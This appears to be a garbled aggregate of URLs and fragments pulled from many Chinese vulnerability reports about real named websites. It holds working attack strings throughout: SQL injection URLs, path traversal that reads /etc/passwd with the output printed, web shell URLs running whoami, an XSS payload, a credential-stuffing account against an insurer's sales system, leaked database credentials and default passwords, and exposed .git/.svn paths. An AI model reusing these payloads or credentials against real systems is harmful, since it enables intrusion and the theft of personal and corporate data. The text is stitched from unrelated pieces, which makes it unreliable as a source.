http://**.**.**.**/pkpmbs/jdmanage/UnitPersonList.aspx?__METHOD=ADD&SUBMIT_TYPE=0&unitID=ffc0782&stationid=2010001&rolecode=JSDW&lzstat_uv=34338219962842780482|1738820&__back2stationlist=/pkpmbs/jdmanage/TJdJianshedanweList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/pkpmbs/jdmanage/UnitPersonList.aspx?__METHOD=ADD&SUBMIT_TYPE=0&unitID=ffc0782&stationid=2010001&rolecode=JSDW&lzstat_uv=34338219962842780482|1738820&__back2stationlist=/pkpmbs/jdmanage/TJdJianshedanweList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/pkpmbs/jdmanage/UnitPersonList.aspx?__METHOD=ADD&SUBMIT_TYPE=0&unitID=ffc0782&stationid=2010001&rolecode=JSDW&lzstat_uv=34338219962842780482|1738820&__back2stationlist=/pkpmbs/jdmanage/TJdJianshedanweList.aspx?lzstat_uv=34338219962842780482|1738820 
http://mss.95590.cn/mss/,大地保险销售支持系统,此处验证码设计简单,可用PKAV的工具绕过,用户名为工号,可利用社工方法获取工号形式,如8000******、3302******等,这里为了证明问题,我仅选用800012****、800013****、800015****、800050****,以密码abc123、abc456、zxc123、qwe123、123456进行撞库,就获得700多个有效账号,登陆后可进行业绩管理、保单管理、客户管理、车商续保管理等等操作,可泄露大量敏感信息。 http://**.**.**.**/.svn/all-wcprops http://newoa.glsc.com.cn:8082/ http://www.lvmama.com/zt/promo/jingpai/?losc=018454 http://community.apicloud.com/bbs/forum.php http://xm.gameyw.netease.com/ http://online.yeepay.com/live800/loginAction.jsp?companyLoginName=222222&loginName=bbbbb111&password=ggggg http://d.huxiu.com/ http://**.**.**.**/bugs/wooyun-2010-0123172描述的问题,用户名密码test/test http://www.securityfocus.com/bid/72585 https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released http://mips-lb02.ebayc3.com/ www.xin.com http://www.xin.com http://**.**.**.**/bugs/wooyun-2015-0131730 http://www.haodai.com/wenda/listindex?keyword=a http://www.haodai.com/wenda/listindex?keyword=a http://buzz.hiiir.com/ http://doogua.dangdang.com/ http://doogua.dangdang.com/api/pass/sign/in post:name=zxczxc&password=zxczxc http://buzz.hiiir.com/ https://art.netease.com/rest/user/update_base http://**.**.**.**/ http://301.peugeot.com.cn/testdrive/form.php?cselect=3434&pselect=3428 http://**.**.**.**/khfw/product.php?id=130 http://**.**.**.**/khfw/product.php?id=130%20and%201=1-- http://**.**.**.**/khfw/product.php?id=130%20and%201=2-- http://**.**.**.**/khfw/product.php?id=130%20and%201=2%20union%20select%201,2,@@basedir,user%28%29,5,version%28%29,7,8,9,10,11-- http://116.204.8.136:8080 http://113.105.248.132:9000/userdata/ http://segmentfault.com/a/1190000000481249 http://au.umeng.com/api/check_app_update http://oa.baison.com.cn/ http://guimiquan.com/login.html view-source:http://www.kdnet.net/conn.asp/1.php view-source:http://jsapi.kdnet.net/ajax_intellect_board_www.asp/1.php B069A3B7DC5038DE580673ADDB1483CE:FG=1 www.998.com https://github.com/cangjie/d1web http://www.d1.com.cn/.git/config 
http://businessinfo.co.uk/labs/xss/xss.swf http://**.**.**.**/bmxx_view.php?id=4188 http://nissancorp.dealer.youxinpai.com http://gtmc.dealer.youxinpai.com http://jlr.dealer.youxinpai.com http://xd2sc.dealer.youxinpai.com http://ftms.dealer.youxinpai.com http://dongfeng-citroencorp.dealer.youxinpai.com http://ford.dealer.youxinpai.com http://chrysler.dealer.youxinpai.com http://ghac.dealer.youxinpai.com http://gmmc.dealer.youxinpai.com http://chery.dealer.youxinpai.com http://faw-vw.dealer.youxinpai.com http://faw-mazda.dealer.youxinpai.com http://peugeotcorp.dealer.youxinpai.com http://wdhac.dealer.youxinpai.com http://fawcar.dealer.youxinpai.com http://ford.dealer.youxinpai.com/login/check/ view-source:http://oa.gds-services.com/yyoa/common/SelectPerson/reloadData.jsp http://oa.g5air.com/ http://**.**.**.**/admin/login.jsp http://**.**.**.**/Item/18860.aspx http://**.**.**.** http://**.**.**.**/ http://**.**.**.** http://**.**.**.** http://wanxuem.baidu.com/?act=course&cateids=72365457293705216%22%20onmouseover=alert%28/a/%29%20a=%22&do=GetFragments&mod=search&r=1 http://**.**.**.**/zabbix/ password:zabbix http://www.ziroom.com/static/upload/crm/contract/HTML/2015/04/BJCW81504200616.HTML http://**.**.**.**/main/searchmail.asp http://**.**.**.**/main/searchmail.asp http://admin.eld.leju.com/?site=manager&ctl=login&act=login http://www.95590.cn/ http://**.**.**.**/action/front/indexAction_prepareIndex http://**.**.**.**/common/bak.jsp http://**.**.**.**/bugs/wooyun-2015-0105242 http://ebook.cmbchina.com/Usp/admin/ http://www.swsc.com.cn:8080/manage/admin/admin.jsp https://**.**.**.**/zhaoyh/java/blob/b4e12b1932084e8298ebf8fadb7c9e9bbc1698f5/web/src/main/resources/applicationContext-resource.xml jdbc:mysql**.**.**.**:3306/ted?useUnicode=true&characterEncoding=UTF-8 http://pms.lifesense.com/ http://**.**.**.**:2008/student http://**.**.**.**:2008/student/均可访问 http://**.**.**.**/student/ http://**.**.**.**:2008/student/result.aspx?cid=&id=A58790A7BEB3C308 
http://v.9978.cn http://eduadmin.openonline.com.cn/LearningCenter/book/orderstu.aspx?oid=335510 http://learn.open.com.cn http://**.**.**.**/ http://**.**.**/user/user/login http://**.**.**.** http://**.**.**.**/static/interface/errorlog_info.php?page=2&md5=440f1947283d8cc66a39ed3c75263921 http://sfzx.nwpu.edu.cn/wenke/admin/uploadface.asp http://sfzx.nwpu.edu.cn/wenke/admin/uploadfaceok.asp http://saleshop.tcl.com.cn:8080/DRP/ http://saleshop.tcl.com.cn:8080/DRP/login?crmLoginId=gt http://tempuri.org/GetByUnit soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope http://webservice.mbox.91huayi.com/service.asmx?op=GetDownloadCounts http://webservice.mbox.91huayi.com/service.asmx?op=GetDownload_counts http://tempuri.org/GetByUnitDetail soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ http://crm2.chemicals.sinopec.com:8100/sap/bc/bsp/sap/crm_ui_start/default.htm http://**.**.**.**/ http://**.**.**.**:8180/ http://mobilerma.zte.com.cn/UILoader/Login.aspx https://moa.zte.com.cn http://**.**.**.**:8090/axis2/ http://**.**.**.**:8090/axis2/axis2-web/5.jsp http://60.28.205.41 http://scc.whut.edu.cn http://59.151.27.170 http://59.151.27.170 https://xxx/dana-na/auth/url_default/welcome.cgi http://**.**.**.**:7001/etrading/ http://**.**.**.**:7001/shell/no.jsp不知道密码 http://**.**.**.**:7001/shell/shell.jsp(猜测是命令马) http://**.**.**.**:7001/shell/shell.jsp?cmd=whoami http://www.chuanke.com/3715386-143596.html http://oa.zyxnzj.com/ http://119.6.107.63/mysql/ http://**.**.**.**/ecdomain/framework/housingfund/eejmklkggijibbnpjpkcodgdecfehdgi.jsp http://www.southbeauty.com/index.php?app=activity&c=view&id=49 
https://**.**.**.**/funexploit/openstack/blob/8e4fce588a7257ca451a69102faa2106c6f59c5a/rst/env.txt http://m.hit.edu.cn/wp-login.php http://**.**.**/ http://10.111.16.159/meizi/ZTdmNWY1NGE3M2I0MTFlNWI2OTJ8MTQ0NDk4MzU2Ng==.xml http://111.206.107.133/meizi/ZTdmNWY1NGE3M2I0MTFlNWI2OTJ8MTQ0NDk4MDQ0Ng==.xml http://cconline.southernfund.com:9898 http://cconline.southernfund.com:9898/webcall_chat/leaveMessage.jsp http://mail.scdc.com.cn:3000/phpMyAdmin/ http://**.**.**.**/ http://www.yingjiesheng.com/click.php?ID=1121&RedirectUrl=http%3A%2F%2Fs.yingjiesheng.com%2F www.yingjiesheng.com http://**.**.**.**/index.php?file=service&smid=26 http://**.**.**.**/images/2.php http://**.**.**.** http://**.**.**.**/guestbook.php http://**.**.**.**/job_detailed.php?id=5 http://**.**.**.**/news_detailed.php?id=170 http://**.**.**.**/actor_detailed.php?id=* http://**.**.**.**/actor.php?cat_id=-1 http://**.**.**.**/news.php?cat_id=* http://**.**.**.**/works.php?cat_id=*&page=2 http://**.**.**.**:80/ CDC414908799537A0EFB45A67C7613B1:FG=1 http://**.**.**.**/login.aspx http://**.**.**.**/cn/index.html http://**.**.**.**/index.jsp http://182.92.187.7:7001/qmzb/ http://182.92.187.7:7001/console/login/LoginForm.jsp http://182.92.187.7:7001/ma/ma3.jsp jdbc:mysql://localhost:3306/qmzb?useUnicode=true&characterEncoding=utf-8 http://182.92.187.7:7001/ma/out.jsp http://**.**.**.**:9090/wh/mobilelogin.jsp http://**.**.**.**/information/getMoreNotice.action http://**.**.**.**/list.aspx?id=6129 http://**.**.**.**/Info_News_C.aspx?id=70 http://**.**.**.**/index.php http://m.xin.com/s/?cityid=201&t=t&c=10794745” http://wenti.ganji.com/feedback_v2/LogIn https://sslvpn.ganji.com http://www.zyrcw.mobi/pass_checkUser.jsp?company_group_id=2846 http://**.**.**.**:8080/webclient/jsp/login.jsp http://220.181.168.128:8080/ http://60.28.205.48:82/cgi-bin/test-cgi http://www.cn357.com/cvi.php?m=ajax&t=register&func=checkUserName&value=aaaaaaa http://www.zydc001.com/web/index.jsp 
http://www.zydc001.com/index_small.jsp http://222.136.71.26/index_small.jsp http://www.95590.cn/ http://**.**.**.**/GetArticle.action?articleId=601存在命令执行漏洞 www.998.com http://**.**.**.** https://**.**.**.**/s?wd=site%3A**.**.**.**&pn=0&oq=site%3A**.**.**.**&tn=baiduhome_pg&ie=utf-8&rsv_idx=2&rsv_pq=978c59aa00037db8&rsv_t=884aX3rGeJMYepgr6dB8gQNb4%2Fr0QzW5VTXwhCVrZdNFJxC%2BX2OzzqvzaQ%2BdZd95G9qT&rsv_jmp=slow http://union.2345.com/products.php?act=view&item=ie2345%bf%27 http://wooyun.org/bugs/wooyun-2010-068815)添加了between脚本,成功注入 http://fenxiao.lvmama.com/ http://new.edong.com http://eip.swsc.com.cn/SSO/Login.aspx http://gamemo.kugou.com/gamemo.kugou.com.tar.gz http://mail.shhuayi.com index.php/member-getpassword http://**.**.**.**:80/ http://www.apply.zjut.edu.cn/en/student/login/fpassword http://asc.ecnu.edu.cn/ http://218.30.110.85:8080/cgi-bin/test-cgi http://218.75.212.7:8181/yyoa/index.jsp jdbc:mysql**.**.**.**:3306/aqx http://**.**.**.**/api/json/sms.action http://**.**.**.**/bugs/wooyun-2015-0143173文章后,继续测试,虽然加入了验证密码次数,但这弱口令太弱了。佩服管理员。 https://**.**.**.** http://group.ppdai.com/uc_server.tar.bz2 http://**.**.**.**/sc8/ http://**.**.**.**/user/findPassword.do http://club.xywy.com/askquestion.php?fromulr= http://img.tmp.xywy.com/562f11e198662.jpg/1.php http://dj.daojia.com.cn/ site:daojia.com.cn来搜索 http://shanghai.bd.daojia.com.cn/为例 http://shanghai.bd.daojia.com.cn/service.php?action=2147483649&user=admin&uid=1445924202965 http://cm.glsc.com.cn:8079/ http://cm.glsc.com.cn:8079/names.nsf存在越权 http://cm.glsc.com.cn:8079/names.nsf/$users http://elreport.ce-air.com/login.do http://union.ceair.com/ http://airport.csair.com/SelfMonitoring/CussMain.do?method=selectData&city=ALL http://safety.ceair.com:7500/sms/sms/safty/employeereport/emReportHome.zul http://wdt-mx.huawei.com/sdtrp/project.action http://119.145.15.78/sdtrp/project.action http://**.**.**.**/coremail/index.jsp http://**.**.**.**/ccbjob/cn/job/index.jsp 
http://**.**.**.**/ccbjob/cn/job/resume/source.jsp?code_set_id=3007&sqlType=3&id=30077903&root=30077903 http://**.**.**.**/login http://**.**.**.**/login http://**.**.**.**/login http://**.**.**.**/login http://**.**.**.**/login http://**.**.**.**/login http://**.**.**.**/login http://**.**.**.**/login https://111.200.229.205/page/maint/login/Page.jsp?templateId=18 http://cctvich.cntv.cn/waiyuadmin/e/admin/FrontLogin.php http://red.ayibang.com http://havboss.vcomlive.com/ http://havboss.vcomlive.com/userValidate?_dc=1445933447187&user=admin&pwd=1234556aa&sysid=2&node=100000&service=http%3A%2F%2F61.158.207.26%3A80%2Foss http://havboss.vcomlive.com/userValidate?_dc=1445933447187&user=admin&pwd=1234556aa&sysid=2&node=100000&service=http%3A%2F%2F61.158.207.26%3A80%2Foss http://sqlmap.org http://**.**.**.**/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://fcdt.800j.com.cn/index.php?m=content&c=newsall&a=investigate&ytlx=2 http://www.easy-linkholiday.com/mapgoogle.asp?id=17679 http://203.130.43.136/Activity/GetActivityIndex.ashx?sessionId=1&req=2501 http://j.china.com/.git/ dir:/home/chineseall/apache-tomcat-6.0.35/webapps/ROOT/ http://www.huandai.net/ http://**.**.**.**/hnwsyy/jxtj.do?type=cx&index=80&jxmc=430942&kskm=2 http://**.**.**.**/wms/upload/file/2013110803082678.xls http://**.**.**.**/wms/upload/file/20130715001425512.xls http://**.**.**.**/wms/upload/file/20120530073654188.xls http://**.**.**.**/wms/upload/file/20120523014231177.xls http://**.**.**.** http://smtp.pindao.com/.git/ http://**.**.**.**/lks/sys/lks_public.nsf/84b5fb13f9d3697c48256b7d00258d27?OpenView http://ts.kuwo.cn/.git/config http://test.cms.imobile.com.cn/.git/ http://test.m.imobile.com.cn/.git/ http://test.pic.imobile.com.cn/.git/ http://test.s.imobile.com.cn/.git/ http://**.**.**.**/seeyon/index.jsp http://**.**.**.**/ http://**.**.**.**/html/p/p_13/p_13.html inurl:cms/leadermail http://wiki.welomo.com/.git URL:http://**.**.**.**/login.action http://**.**.**.**/ 
http://**.**.**.**/ http://**.**.**.**/xgweb/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.huishangsuo.com/Style/header/upload.php?uid=61963 http://xms.be.xiaomi.com/common/common!ajaxBrandJson.action?checkedId=1& http://wx.push.ujipin.com/.svn/entries http://ekp.joyu.com/ http://h5.998.com http://h5.998.com/unionpay_bankcard.html http://club.huawei.com/plugin.php?sctime=0&page=3&srchtxt=% http://club.huawei.com/plugin.php?sctime=0&page=3&srchtxt=% jdbc:oracle:thin:@**.**.**.**:1521:hbzqdb http://**.**.**.**/content.asp?id=25425 http://wooyun.org/bugs/wooyun-2010-0149556 http://nissancorp.dealer.youxinpai.com http://gtmc.dealer.youxinpai.com http://jlr.dealer.youxinpai.com http://xd2sc.dealer.youxinpai.com http://ftms.dealer.youxinpai.com http://dongfeng-citroencorp.dealer.youxinpai.com http://ford.dealer.youxinpai.com http://chrysler.dealer.youxinpai.com http://ghac.dealer.youxinpai.com http://gmmc.dealer.youxinpai.com http://chery.dealer.youxinpai.com http://faw-vw.dealer.youxinpai.com http://faw-mazda.dealer.youxinpai.com http://peugeotcorp.dealer.youxinpai.com http://wdhac.dealer.youxinpai.com http://fawcar.dealer.youxinpai.com http://dealer.youxinpai.com http://dealer.youxinpai.com/ck_testcheck/view?bigareaid=1&provinceid=2&cityid=201&car_scarmodel=0&car_scarmodels=&car_serials=&vin=&imei=&status=-1&start_time=2015-10-01&end_time=2015-10-27&submit=%E6%9F%A5%E8%AF%A2 sdbaoye.dzwww.com/index.php?a=public_menu_left&c=Index&m=Home&menuid=1 http://www.qinzhu.ecnu.edu.cn/department/HeartRoom/HeartFront/content.aspx?id=%201448 https://github.com/manageyunying jdbc:mysql://127.0.0.1/manage?useUnicode=true& jdbc:mysql://10.128.7.247:3306/mobileprivatetrace?useUnicode=true& jdbc:mysql://100.98.70.86:3306/managerdb jdbc:mysql://rds1p2w2yitw263r3ygu.mysql.rds.aliyuncs.com/mobilebasic jdbc:mysql://rds54mgaqv8osck2y467.mysql.rds.aliyuncs.com/browserxhrdata 
jdbc:mysql://rdsbp0m36ou1p84t8349.mysql.rds.aliyuncs.com/tpmsaas jdbc:mysql://rds858w9g04b5598k070.mysql.rds.aliyuncs.com/mobileprivatedata jdbc:mysql://rds3em7yjj9rm36bfr1u.mysql.rds.aliyuncs.com/analytics jdbc:mysql://rds84584weefk677y690.mysql.rds.aliyuncs.com/usercenter jdbc:mysql://10.251.126.18/tpmsaas jdbc:mysql://10.104.15.224/tpmsaas jdbc:mysql://db-server:3306/ymy_test?user=zhaohaijun&password=676892 jdbc:hive2://10.128.17.21:10000 http://manage.oneapm.com/ http://manage.oneapm.com/ http://manage.oneapm.com/ http://manage.oneapm.com/ https://oneapm.kf5.com/ jdbc:mysql://100.98.70.86:3306/managerdb jdbc:mysql://119.29.28.190:3306/webhook http://**.**.**/ http://zhanzhang.anquan.org/vul-detail/52fde4f64eb8d70df476ecb4/ http://e-policy.minanins.com/%c0%ae/WEB-INF/web.xml http://e-policy.minanins.com/%c0%ae/WEB-INF/webContext.xml http://e-policy.minanins.com/%c0%ae/WEB-INF/web-servlet.xml http://**.**.**.**/Dlib/GetPasswdAcc.asp http://**.**.**.**/Dlib/GetPasswdAcc.asp http://**.**.**.**/Dlib/GetPasswdAcc.asp http://**.**.**.**:8080/Dlib/GetPasswdAcc.asp http://**.**.**.**/Dlib/GetPasswdAcc.asp http://**.**.**.**:82//GetPasswdAcc.asp http://**.**.**.**:81/GetPasswdAcc.asp http://**.**.**.**:81//GetPasswdAcc.asp https://bj-sso.365ime.com/sso/authorize?response_type=code&client_id=ime_web&redirect_uri=http://web.365ime.com/ www.u88.com官网redis未授权访问: www.u88.com www.u88.com:6379 URL:http://tcmobileapi.17usoft.com/Movie/default.aspx http://tcmobileapi.17usoft.com/hotel/orderhandler.ashx http://wooyun.org/bugs/wooyun-2010-0137596 http://www.phibrofx.co/zh-cn/read.jsp?id=16,如图所示: https://**.**.**.**/qiyadeng/XrMessage/blob/3f64fa4cd6b3fffa6670b96f3cab9418683b3b69/XuriMessage/code/XuriMessage/src/main/resources/META-INF/spring/database.properties http://**.**.**.** http://**.**.**.**/bugs/wooyun-2015-0116152 http://**.**.**.** http://**.**.**.**/forum/w%3D580/sign=56d6d7942e34349b74066e8df9e81521/016e292a6059252da7d12b8a329b033b59b5b996.jpg 
http://**.**.**.**/portal/order/TOrderMgr.htm?m=query&f=getOrderById&orderId=83055&unlogflag=1 http://www.lvmama.com/trip/show/64766 www.lvmama.com http://**.**.**.**/news_fullpage.php?pattern=0&table_name=congratulation http://**.**.**.**/news_fullpage.php?pattern=0&table_name=congratulation http://**.**.**.**/manage_main.php http://**.**.**.**/test.php http://www.sxhtjs.com.cn/login http://www.zhimatech.com/.git/config http://**.**.**.**/ http://yun.haodai.com/forget/index jdbc:oracle:thin:@**.**.**.**:1521:orcl http://**.**.**.**/ http://**.**.**.**/AIPRTJ/home/getEDToTy?LAST_UPDATE_DATE=1970-1-1 http://**.**.**.**/pagelisting.php?id=P00070 http://**.**.**.**/pagelisting.php?id=P00070 http://**.**.**.**/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://support.ztenv.com.cn/exp/exp_list_detl.asp?flg=1&expid=511 http://lsb.360shop.com.cn/.svn/entries http://union.kuwo.cn/install/index.jsp http://219.143.252.247:8081/ http://219.143.252.247:8084 http://219.143.252.247:8087/ https://**.**.**.**/oauth2/genqr http://staff.cntv.cn/ http://58.20.40.249:7001/entbank/login.action http://58.20.40.249:7001/console shell:http://58.20.40.249:7001/ca/ma3.jsp encap:Ethernet BB:58:5A addr:172.17.11.32 Bcast:172.17.11.255 Mask:255.255.255.0 MTU:1500 packets:1695524404 dropped:35730435 packets:1656137337 txqueuelen:1000 Interrupt:186 Memory:dc000000-dc012800 encap:Ethernet BB:58:5A addr:172.17.11.33 Bcast:172.17.11.255 Mask:255.255.255.0 MTU:1500 Interrupt:186 Memory:dc000000-dc012800 encap:Ethernet BB:58:5C addr:192.168.10.1 Bcast:192.168.10.255 Mask:255.255.255.0 MTU:1500 packets:5119322 packets:10178977 txqueuelen:1000 Interrupt:193 Memory:da000000-da012800 encap:Local addr:127.0.0.1 Mask:255.0.0.0 MTU:16436 packets:2147483647 packets:2147483647 http://mi.xcar.com.cn/interface/gcpapp/askSalePrice.php 
http://c.gdt.qq.com/gdt_clickwap.fcg?viewid=laFsxWYgZ_LrcFMuE3oSqZlaETN7Sl1YAdyDMh7_hvdu_WEKLPtQPlvQCtRGdFhyRs31wSg2jlSsuzymM!Us1RsgV6ep7W!ltv8j_ichTqKN5KUJvudeLZ!7XEheWt0g6IQ62yb6UbJ6PnzulnqzYRhWnckyNlZ8&jtype=0&wapver=2&i=1&os=0 http://test2.m.letv.com/.svn/entries http://**.**.**.**/bugs/wooyun-2015-0139485 http://**.**.**.**/wap2stock/infoList.do?classid=1001 http://**.**.**.**/wap2stock/info.do?classid=1001&id=16379 news.sogou.com/wapdata?File=../../../../../../../../../etc/httpd/conf/httpd.conf&Page=1&t=1438273990794&Type=all http://news.sogou.com/wapdata?File=../../../../../../../../../etc/passwd&Page=1&t=1438273990794&Type=all root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin rpcuser:x:29:29:RPC 
User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin odin:x:500:500::/home/odin:/bin/bash nagios:x:101:501:nagios:/var/log/nagios:/bin/sh netmonitor:x:501:502::/home/netmonitor:/bin/bash guest:x:502:503::/opt/guest:/bin/bash memcached:x:102:158:Memcached daemon:/var/run/memcached:/sbin/nologin smarton:x:503:504::/home/smarton:/usr/bin/uptime http://mail.citvc.com/ http://**.**.**.**/show.asp?id=110&jdfwkey=fpxja http://**.**.**.**/show.asp?id=8149&jdfwkey=fpxja http://m.midifan.com/news.php?companyid=1&page=4 http://sell.ips.com.cn/Login.aspx http://sell.ips.com.cn/User/UserFindPwd.aspx?type=moblie http://**.**.**.**/,可用常用用户名和弱口令123456进行撞库,获取有效账号,登陆后可查看内部信息。 http://**.**.**.**/xwbd/gdgg_nr.asp?id=17 http://**.**.**.**/bzwx/bzwx_nr.asp?id=11352 http://**.**.**.**/sptm/sptm_nr.asp?id=1328 http://**.**.**.**/jgdm/jgdm_nr.asp?id=833 http://**.**.**.**/xwbd/xwbd_nr.asp?id=3509 http://**.**.**.**/wto/wto_nr.asp?id=2880 http://**.**.**.**/tsfb/tsnr_nr.asp?id=3162 URL:http://**.**.**.**/search/search.asp POST:lm=%D0%C2%CE%C5%B1%A8%B5%C0&xm=%B1%EA%CC%E2&key=1&search.x=28&search.y=1 http://a.xcar.com.cn/huodong/201509/showfall/comment.php?tid=2 http://oms.znv.com/exp/exp_list_detl.asp?flg=1&expid=647 http://sandbox.api.haodai.com/.svn/entries http://**.**.**.**/bugs/wooyun-2015-0134796 https://**.**.**.** http://**.**.**.**/ http://www.qioa.cn/product/xsd.html http://www.qioa.cn/index.php?m=content&c=index&a=lists&catid=7 http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1 http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1 http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1 http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1 http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1 
http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1 http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1 http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_ http://**.**.**//client/checkuser.aspxuser=1%27&pwd=1_ http://**.**.**//client/checkuser.aspxuser=%27&pwd=1_ http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_ http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_ http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_ http://c.ebaoyang.cn http://www.youxinpai.com/app/buyer/ http://newmobile3.youxinpai.com/ChannelData/GetBannerList.ashx http://124.115.26.74:8081/.git/config http://bbs.lidroid.com:8085/.git/config http://apps.lidroid.com/.git/config http://blog.lidroid.com/.git/config http://i.lidroid.com/.git/config http://static.lidroid.com/.git/config http://**.**.**.**/News/Default.aspx?Kind=c00001 http://**.**.**.**/hk/industrymore.aspx?q=Block https://github.com/kongzhidea/kongzhidea/blob/7286f9c1a7b65bc85bd113223016d2fb1ee0f5f8/xoa/xoa-common/xoa-client-registry/src/main/java/com/xoa/client/util/SendMailUtil.java https://github.com/kongzhidea/kongzhidea/blob/7286f9c1a7b65bc85bd113223016d2fb1ee0f5f8/xoa/xoa-common/xoa-client-registry/src/main/java/com/xoa/client/util/SendMailUtil.java http://ebaoyang.cn/front/index/show?model=130367&ss=1050001 http://**.**.**.**:8081/RuvarHRM/ http://**.**.**.**:8080/RuvarHRM/ http://**.**.**.**/ http://www.adyun.com/zhaopin/jobdetail?rid=98 index.php/house/ajax_set_score/?s=0.10654069157317281 http://yy.loupan.com/ B773EEC577A0B64DB44371A12DDA3B1D:FG=1 http://**.**.**.**/bugs/wooyun-2015-098853 http://**.**.**.**/index.asp http://rus.ecnu.edu.cn:80/ http://**.**.**.**/system/Advise/View.aspx?id=15 http://**.**.**.**/MainPage.aspx http://**.**.**.**/system/Advise/View.aspx?id=15 http://**.**.**.**/bugs/wooyun-2015-0129923 inurl:/themes/mskin/login/ inurl://mskin/login/ http://119.254.70.128 
http://119.254.70.146/logs/ http://119.254.70.153/logs/ http://**.**.**.**/news.php?sn=750 http://**.**.**.**/BG/nzcms_list_news.asp?id=724&sort_id=664 http://www.tintinloan.com/newCaculate.jsp http://**.**.**.**/bugs/wooyun-2015-0149860/trace/396c9e18412ae4bb2d3013b244d7435e http://123.150.185.221:8080/index.php http://**.**.**.** http://**.**.**.**/2013ruijin/ruijin/ http://**.**.**.**/OA.Portal.Website/Pages/Default.aspx http://**.**.**.**/2013ruijin/ruijin/jssq/jxsqcs/index.shtml http://nwgzportal.health.ikang.com/loginui https://github.com/doublesw/kuwoJumpServer http://**.**.**.**:8000/GetHotelListAction!initImport.do http://**.**.**.**/ http://**.**.**.**/tools/download.php?src=../../index.php http://**.**.**.**/Backstage/functions/login.php index.php/house/ajax_set_support/?s=0.27279418450780213 http://xm.loupan.com/ BBE986E212513ABDE98CD4B4C7553968:FG=1 http://hezuo.xcar.com.cn/iphone/kc/bbsGetPostsByForumId.php?type=2&limit=20&offset=0&forumId=874 https://mail.jinjianghotels.com/ http://intranet.jinjianghotels.com/ http://srm.jinjianghotels.com/jjsrm/Portal/StartPage.aspx http://124.117.242.168/ http://xnypx.600795.com.cn:81 http://**.**.**.**/bmxx_view.php?id=4188 http://**.**.**.**/Cjsfw_info.php?id=13331 http://**.**.**.**/vod_view.php?id=287 http://**.**.**.**/web_content.php?id=13646 http://**.**.**.**/list3.php?maxcid=7&cid=29 http://**.**.**.**/xzzx.php?infoclass=13 http://**.**.**.**/article_list.php?S_id=25 http://**.**.**.**/admin/menu.php http://**.**.**.**/data/ http://**.**.**.**/upload/ http://**.**.**.**/aspnet_client/ http://**.**.**.**/upload/20130922152854772.php http://**.**.**.**/upload/20130922153411298.php http://**.**.**.**/upload/20130922153719975.php http://**.**.**.**/upload/images/help.php http://**.**.**.**/upload/ylcfxkjj.txt http://**.**.**.**/rendawork/Index.do http://**.**.**.**/login/Login.jsp?logintype=1 https://**.**.**.**/node/stock-market/plaza/sell http://**.**.**.**/bugs/wooyun-2010-0139659这里看到主站一处注入的account表再次躺枪 
